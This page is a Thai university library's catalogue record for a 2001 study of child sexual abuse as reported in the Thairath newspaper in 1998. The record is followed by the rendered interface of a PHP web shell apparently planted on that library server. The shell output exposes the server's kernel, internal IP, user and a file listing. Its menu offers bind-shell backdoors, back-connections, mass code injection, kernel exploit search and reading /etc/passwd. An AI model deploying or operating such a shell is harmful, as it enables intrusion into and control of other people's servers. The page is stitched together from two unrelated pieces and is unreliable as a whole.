ศึกษาการทารุณกรรมทางเพศเด็กจากหนังสือพิมพ์รายวันไทย.

Titleศึกษาการทารุณกรรมทางเพศเด็กจากหนังสือพิมพ์รายวันไทย.
Publication TypeResearch
Year of Publication2544
Authorsสงวน ธานี.
Institutionมหาวิทยาลัยบูรพา. คณะพยาบาลศาสตร์.
Cityชลบุรี.
Typeงานวิจัย.
ISBN Number9745468967
Keywordsการทารุณทางเพศต่อเด็ก., การทารุณเด็ก., สาขาสังคมวิทยา., เด็กที่ถูกทารุณทางเพศ.
Abstractการวิจัยนี้เป็นการวิจัยเชิงสำรวจ โดยมีวัตถุประสงค์เพื่อรวบรวมรายละเอียดเกี่ยวกับสถานการณ์การทารุณกรรมทางเพศเด็กที่รายงานในหนังสือพิมพ์รายวันไทย ข้อมูลที่ใช้ในการวิจัยครั้งนี้ได้จากการวิเคราะห์เนื้อหาของข่าวจากหนังสือพิมพ์รายวันไทย 1 ฉบับ คือหนังสือพิมพ์ไทยรัฐตั้งแต่ฉบับวันที่ 1 มกราคม 2541 ถึงวันที่ 31 ธันวาคม 2541 รวม 365 ฉบับ ได้ข่าวเกี่ยวกับการทารุณกรรมทางเพศเด็กจำนวน 82 ข่าว ผลการวิเคราะห์เนื้อหาสรุปได้ดังนี้1. ผู้กระทำทารุณกรรมทางเพศทั้งหมดเป็นผู้ชาย ช่วงอายุที่พบมากที่สุดคือ 31-40 ปี2. ผู้ถูกทารุณกรรมทางเพศส่วนใหญ่เป็นเด็กหญิง ช่วงอายุที่พบมากที่สุดคือ 13-16 ปี3. สถานที่เกิดเหตุการณ์การทารุณกรรมทางเพศ ส่วนใหญ่พบว่าเป็นนอกบ้านของผู้ถูกทารุณกรรม ส่วนใหญ่เหตุเกิดในบ้านของผู้กระทำทารุณกรรม4. ความสัมพันธ์ระหว่างผู้กระทำทารุณกรรมและผู้ถูกทารุณกรรมทางเพศส่วนใหญ่คือ เป็นคนที่รู้จักกับเด็ก โดยเป็นเพื่อนบ้านและคนรู้จักกับพ่อแม่มากที่สุด5. อัตราส่วนระหว่างผู้กระทำทารุณกรรมทางเพศกับผู้ถูกทารุณกรรมทางเพศส่วนใหญ่เป็นหนึ่งต่อหนึ่ง คือ มีผู้กระทำทารุณกรรม 1 คนต่อผู้ถูกทารุณกรรมทางเพศ 1 คน Abstract: The purpose of this research was to survery incidents of child abuse that depicted on daily newspapers in Thailand. A major newspaper, Thairath was selected to represent the incidents of child abuse. Three hundred and sixty five documents from January 1 1998 to December 31 1998 were analyzed using content analysis. Results showed that 82 items contained child abuse files.The research results are concluded as follows:1.The abusers of child sexual abuse were men aged 31-40 years old.2. Majority of child sexual abuse victims was female aged 13-16 years old.3. Majority of child sexual abuse incidents took place outside's child residents usually in the abusers' houses.4. The relationship between children and abusers was familiarity, for example neighbors, and their parental friends.5. The ratio of the child and the abuser was one by one.
Research Notesได้รับทุนอุดหนุนการวิจัยจากงบรายได้คณะพยาบาลศาสตร์
Alternate TitleStudy of Child Sexual Abuse from Thai Daily Newspapers.
GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.22 (EL). PHP/5.3.8
Kernel: Linux www.lib.buu.ac.th 2.6.18-371.1.2.el5 #1 SMP Tue Oct 22 12:51:53 EDT 2013 x86_64Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 266.53 GB of 389.83 GB (68.37%)Server IP: 10.32.1.15 - Your IP: 54.167.138.53

/var/www/html/www/buuir/research/   drwxrwxr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (22 files and 8 folders):

Name [asc] Size Modify Owner/Group Perms Action
.. LINK 01.09.2014 14:07:15 500/500 drwxrwxr-x [info] 
. LINK 24.01.2015 12:35:08 500/500 drwxrwxr-x [info] 
[scripts] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[profiles] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[includes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[sites] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[modules] DIR 24.01.2015 12:55:44 500/500 drwxr-xr-x [info] 
[misc] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[themes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[under] DIR 03.06.2014 15:19:55 500/500 drwxrwxr-x [info] 
 CHANGELOG.txt 63.49 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 web.config 2 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 README.txt 3.41 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction_buuir.jpg 44.98 KB 03.06.2014 15:53:14 500/500 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 7.77 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 17.09.2011 21:50:20 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction.html 296 B 03.06.2014 15:56:51 500/500 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.45 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.06 KB 08.03.2013 17:07:32 500/500 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 update.php 18.88 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .gitignore 174 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 996 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0209 ]:.